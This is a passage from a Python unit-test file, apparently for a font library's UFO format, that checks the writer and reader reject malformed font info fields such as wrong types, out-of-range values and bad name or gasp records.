info["guidelines"] = [dict(x=0, color="0, 0, 2, 0")]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(x=0, color="0, 0, 0, 2")]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# identifier
## duplicate
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(x=0, identifier="guide1"), dict(y=0, identifier="guide1")]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
class WriteFontInfoVersion3TestCase(unittest.TestCase):
def setUp(self):
self.tempDir = tempfile.mktemp()
os.mkdir(self.tempDir)
self.dstDir = os.path.join(self.tempDir, "test.ufo")
def tearDown(self):
shutil.rmtree(self.tempDir)
def tearDownUFO(self):
if os.path.exists(self.dstDir):
shutil.rmtree(self.dstDir)
def makeInfoObject(self):
infoObject = TestInfoObject()
for attr, value in list(fontInfoVersion3.items()):
setattr(infoObject, attr, value)
return infoObject
def readPlist(self):
path = os.path.join(self.dstDir, "fontinfo.plist")
with open(path, "rb") as f:
plist = readPlist(f)
return plist
def testWrite(self):
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
writer.writeInfo(infoObject)
writtenData = self.readPlist()
for attr, originalValue in list(fontInfoVersion3.items()):
newValue = writtenData[attr]
self.assertEqual(newValue, originalValue)
self.tearDownUFO()
def testGenericWrite(self):
# familyName
infoObject = self.makeInfoObject()
infoObject.familyName = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# styleName
infoObject = self.makeInfoObject()
infoObject.styleName = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# styleMapFamilyName
infoObject = self.makeInfoObject()
infoObject.styleMapFamilyName = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# styleMapStyleName
## not a string
infoObject = self.makeInfoObject()
infoObject.styleMapStyleName = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## out of range
infoObject = self.makeInfoObject()
infoObject.styleMapStyleName = "REGULAR"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# versionMajor
infoObject = self.makeInfoObject()
infoObject.versionMajor = "1"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# versionMinor
infoObject = self.makeInfoObject()
infoObject.versionMinor = "0"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# copyright
infoObject = self.makeInfoObject()
infoObject.copyright = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# trademark
infoObject = self.makeInfoObject()
infoObject.trademark = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# unitsPerEm
infoObject = self.makeInfoObject()
infoObject.unitsPerEm = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# descender
infoObject = self.makeInfoObject()
infoObject.descender = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# xHeight
infoObject = self.makeInfoObject()
infoObject.xHeight = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# capHeight
infoObject = self.makeInfoObject()
infoObject.capHeight = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# ascender
infoObject = self.makeInfoObject()
infoObject.ascender = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# italicAngle
infoObject = self.makeInfoObject()
infoObject.italicAngle = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
def testGaspWrite(self):
# not a list
infoObject = self.makeInfoObject()
infoObject.openTypeGaspRangeRecords = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# empty list
infoObject = self.makeInfoObject()
infoObject.openTypeGaspRangeRecords = []
writer = UFOWriter(self.dstDir, formatVersion=3)
writer.writeInfo(infoObject)
self.tearDownUFO()
# not a dict
infoObject = self.makeInfoObject()
infoObject.openTypeGaspRangeRecords = ["abc"]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# dict not properly formatted
infoObject = self.makeInfoObject()
infoObject.openTypeGaspRangeRecords = [dict(rangeMaxPPEM=0xFFFF, notTheRightKey=1)]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.openTypeGaspRangeRecords = [dict(notTheRightKey=1, rangeGaspBehavior=[0])]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# not an int for ppem
infoObject = self.makeInfoObject()
infoObject.openTypeGaspRangeRecords = [dict(rangeMaxPPEM="abc", rangeGaspBehavior=[0]), dict(rangeMaxPPEM=0xFFFF, rangeGaspBehavior=[0])]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# not a list for behavior
infoObject = self.makeInfoObject()
infoObject.openTypeGaspRangeRecords = [dict(rangeMaxPPEM=10, rangeGaspBehavior="abc"), dict(rangeMaxPPEM=0xFFFF, rangeGaspBehavior=[0])]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# invalid behavior value
infoObject = self.makeInfoObject()
infoObject.openTypeGaspRangeRecords = [dict(rangeMaxPPEM=10, rangeGaspBehavior=[-1]), dict(rangeMaxPPEM=0xFFFF, rangeGaspBehavior=[0])]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# not sorted
infoObject = self.makeInfoObject()
infoObject.openTypeGaspRangeRecords = [dict(rangeMaxPPEM=0xFFFF, rangeGaspBehavior=[0]), dict(rangeMaxPPEM=10, rangeGaspBehavior=[0])]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# no 0xFFFF
infoObject = self.makeInfoObject()
infoObject.openTypeGaspRangeRecords = [dict(rangeMaxPPEM=10, rangeGaspBehavior=[0]), dict(rangeMaxPPEM=20, rangeGaspBehavior=[0])]
writer = UFOWriter(self.dstDir, formatVersion=3)
writer.writeInfo(infoObject)
self.tearDownUFO()
def testHeadWrite(self):
# openTypeHeadCreated
## not a string
infoObject = self.makeInfoObject()
infoObject.openTypeHeadCreated = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## invalid format
infoObject = self.makeInfoObject()
infoObject.openTypeHeadCreated = "2000-Jan-01 00:00:00"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeHeadLowestRecPPEM
infoObject = self.makeInfoObject()
infoObject.openTypeHeadLowestRecPPEM = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeHeadFlags
infoObject = self.makeInfoObject()
infoObject.openTypeHeadFlags = [-1]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
def testHheaWrite(self):
# openTypeHheaAscender
infoObject = self.makeInfoObject()
infoObject.openTypeHheaAscender = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeHheaDescender
infoObject = self.makeInfoObject()
infoObject.openTypeHheaDescender = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeHheaLineGap
infoObject = self.makeInfoObject()
infoObject.openTypeHheaLineGap = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeHheaCaretSlopeRise
infoObject = self.makeInfoObject()
infoObject.openTypeHheaCaretSlopeRise = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeHheaCaretSlopeRun
infoObject = self.makeInfoObject()
infoObject.openTypeHheaCaretSlopeRun = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeHheaCaretOffset
infoObject = self.makeInfoObject()
infoObject.openTypeHheaCaretOffset = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
def testNameWrite(self):
# openTypeNameDesigner
infoObject = self.makeInfoObject()
infoObject.openTypeNameDesigner = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeNameDesignerURL
infoObject = self.makeInfoObject()
infoObject.openTypeNameDesignerURL = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeNameManufacturer
infoObject = self.makeInfoObject()
infoObject.openTypeNameManufacturer = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeNameManufacturerURL
infoObject = self.makeInfoObject()
infoObject.openTypeNameManufacturerURL = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeNameLicense
infoObject = self.makeInfoObject()
infoObject.openTypeNameLicense = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeNameLicenseURL
infoObject = self.makeInfoObject()
infoObject.openTypeNameLicenseURL = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeNameVersion
infoObject = self.makeInfoObject()
infoObject.openTypeNameVersion = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeNameUniqueID
infoObject = self.makeInfoObject()
infoObject.openTypeNameUniqueID = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeNameDescription
infoObject = self.makeInfoObject()
infoObject.openTypeNameDescription = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeNamePreferredFamilyName
infoObject = self.makeInfoObject()
infoObject.openTypeNamePreferredFamilyName = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeNamePreferredSubfamilyName
infoObject = self.makeInfoObject()
infoObject.openTypeNamePreferredSubfamilyName = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeNameCompatibleFullName
infoObject = self.makeInfoObject()
infoObject.openTypeNameCompatibleFullName = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeNameSampleText
infoObject = self.makeInfoObject()
infoObject.openTypeNameSampleText = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeNameWWSFamilyName
infoObject = self.makeInfoObject()
infoObject.openTypeNameWWSFamilyName = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeNameWWSSubfamilyName
infoObject = self.makeInfoObject()
infoObject.openTypeNameWWSSubfamilyName = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeNameRecords
## not a list
infoObject = self.makeInfoObject()
infoObject.openTypeNameRecords = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## not a dict
infoObject = self.makeInfoObject()
infoObject.openTypeNameRecords = ["abc"]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## invalid dict structure
infoObject = self.makeInfoObject()
infoObject.openTypeNameRecords = [dict(foo="bar")]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## incorrect keys
infoObject = self.makeInfoObject()
infoObject.openTypeNameRecords = [
dict(nameID=1, platformID=1, encodingID=1, languageID=1, string="Name Record.", foo="bar")
]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.openTypeNameRecords = [
dict(platformID=1, encodingID=1, languageID=1, string="Name Record.")
]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.openTypeNameRecords = [
dict(nameID=1, encodingID=1, languageID=1, string="Name Record.")
]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.openTypeNameRecords = [
dict(nameID=1, platformID=1, languageID=1, string="Name Record.")
]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.openTypeNameRecords = [
dict(nameID=1, platformID=1, encodingID=1, string="Name Record.")
]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.openTypeNameRecords = [
dict(nameID=1, platformID=1, encodingID=1, languageID=1)
]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## invalid values
infoObject = self.makeInfoObject()
infoObject.openTypeNameRecords = [
dict(nameID="1", platformID=1, encodingID=1, languageID=1, string="Name Record.")
]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.openTypeNameRecords = [
dict(nameID=1, platformID="1", encodingID=1, languageID=1, string="Name Record.")
]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.openTypeNameRecords = [
dict(nameID=1, platformID=1, encodingID="1", languageID=1, string="Name Record.")
]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.openTypeNameRecords = [
dict(nameID=1, platformID=1, encodingID=1, languageID="1", string="Name Record.")
]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.openTypeNameRecords = [
dict(nameID=1, platformID=1, encodingID=1, languageID=1, string=1)
]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## duplicate
infoObject = self.makeInfoObject()
infoObject.openTypeNameRecords = [
dict(nameID=1, platformID=1, encodingID=1, languageID=1, string="Name Record."),
dict(nameID=1, platformID=1, encodingID=1, languageID=1, string="Name Record.")
]
writer = UFOWriter(self.dstDir, formatVersion=3)
writer.writeInfo(infoObject)
def testOS2Write(self):
# openTypeOS2WidthClass
## not an int
infoObject = self.makeInfoObject()
infoObject.openTypeOS2WidthClass = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## out or range
infoObject = self.makeInfoObject()
infoObject.openTypeOS2WidthClass = 15
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeOS2WeightClass
## not an int
infoObject = self.makeInfoObject()
infoObject.openTypeOS2WeightClass = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## out of range
infoObject = self.makeInfoObject()
infoObject.openTypeOS2WeightClass = -50
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeOS2Selection
infoObject = self.makeInfoObject()
infoObject.openTypeOS2Selection = [-1]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeOS2VendorID
infoObject = self.makeInfoObject()
infoObject.openTypeOS2VendorID = 1234
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeOS2Panose
## not an int
infoObject = self.makeInfoObject()
infoObject.openTypeOS2Panose = [0, 1, 2, 3, 4, 5, 6, 7, 8, str(9)]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## too few values
infoObject = self.makeInfoObject()
infoObject.openTypeOS2Panose = [0, 1, 2, 3]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## too many values
infoObject = self.makeInfoObject()
infoObject.openTypeOS2Panose = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeOS2FamilyClass
## not an int
infoObject = self.makeInfoObject()
infoObject.openTypeOS2FamilyClass = [0, str(1)]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## too few values
infoObject = self.makeInfoObject()
infoObject.openTypeOS2FamilyClass = [1]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## too many values
infoObject = self.makeInfoObject()
infoObject.openTypeOS2FamilyClass = [1, 1, 1]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## out of range
infoObject = self.makeInfoObject()
infoObject.openTypeOS2FamilyClass = [1, 20]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeOS2UnicodeRanges
## not an int
infoObject = self.makeInfoObject()
infoObject.openTypeOS2UnicodeRanges = ["0"]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## out of range
infoObject = self.makeInfoObject()
infoObject.openTypeOS2UnicodeRanges = [-1]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeOS2CodePageRanges
## not an int
infoObject = self.makeInfoObject()
infoObject.openTypeOS2CodePageRanges = ["0"]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## out of range
infoObject = self.makeInfoObject()
infoObject.openTypeOS2CodePageRanges = [-1]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeOS2TypoAscender
infoObject = self.makeInfoObject()
infoObject.openTypeOS2TypoAscender = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeOS2TypoDescender
infoObject = self.makeInfoObject()
infoObject.openTypeOS2TypoDescender = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeOS2TypoLineGap
infoObject = self.makeInfoObject()
infoObject.openTypeOS2TypoLineGap = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeOS2WinAscent
infoObject = self.makeInfoObject()
infoObject.openTypeOS2WinAscent = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.openTypeOS2WinAscent = -1
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeOS2WinDescent
infoObject = self.makeInfoObject()
infoObject.openTypeOS2WinDescent = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.openTypeOS2WinDescent = -1
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeOS2Type
## not an int
infoObject = self.makeInfoObject()
infoObject.openTypeOS2Type = ["1"]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## out of range
infoObject = self.makeInfoObject()
infoObject.openTypeOS2Type = [-1]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeOS2SubscriptXSize
infoObject = self.makeInfoObject()
infoObject.openTypeOS2SubscriptXSize = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeOS2SubscriptYSize
infoObject = self.makeInfoObject()
infoObject.openTypeOS2SubscriptYSize = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeOS2SubscriptXOffset
infoObject = self.makeInfoObject()
infoObject.openTypeOS2SubscriptXOffset = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeOS2SubscriptYOffset
infoObject = self.makeInfoObject()
infoObject.openTypeOS2SubscriptYOffset = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeOS2SuperscriptXSize
infoObject = self.makeInfoObject()
infoObject.openTypeOS2SuperscriptXSize = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeOS2SuperscriptYSize
infoObject = self.makeInfoObject()
infoObject.openTypeOS2SuperscriptYSize = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeOS2SuperscriptXOffset
infoObject = self.makeInfoObject()
infoObject.openTypeOS2SuperscriptXOffset = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeOS2SuperscriptYOffset
infoObject = self.makeInfoObject()
infoObject.openTypeOS2SuperscriptYOffset = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeOS2StrikeoutSize
infoObject = self.makeInfoObject()
infoObject.openTypeOS2StrikeoutSize = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeOS2StrikeoutPosition
infoObject = self.makeInfoObject()
infoObject.openTypeOS2StrikeoutPosition = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
def testVheaWrite(self):
# openTypeVheaVertTypoAscender
infoObject = self.makeInfoObject()
infoObject.openTypeVheaVertTypoAscender = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeVheaVertTypoDescender
infoObject = self.makeInfoObject()
infoObject.openTypeVheaVertTypoDescender = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeVheaVertTypoLineGap
infoObject = self.makeInfoObject()
infoObject.openTypeVheaVertTypoLineGap = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeVheaCaretSlopeRise
infoObject = self.makeInfoObject()
infoObject.openTypeVheaCaretSlopeRise = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeVheaCaretSlopeRun
infoObject = self.makeInfoObject()
infoObject.openTypeVheaCaretSlopeRun = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# openTypeVheaCaretOffset
infoObject = self.makeInfoObject()
infoObject.openTypeVheaCaretOffset = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
def testFONDWrite(self):
# macintoshFONDFamilyID
infoObject = self.makeInfoObject()
infoObject.macintoshFONDFamilyID = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# macintoshFONDName
infoObject = self.makeInfoObject()
infoObject.macintoshFONDName = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
def testPostscriptWrite(self):
# postscriptFontName
infoObject = self.makeInfoObject()
infoObject.postscriptFontName = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# postscriptFullName
infoObject = self.makeInfoObject()
infoObject.postscriptFullName = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# postscriptSlantAngle
infoObject = self.makeInfoObject()
infoObject.postscriptSlantAngle = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# postscriptUniqueID
infoObject = self.makeInfoObject()
infoObject.postscriptUniqueID = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
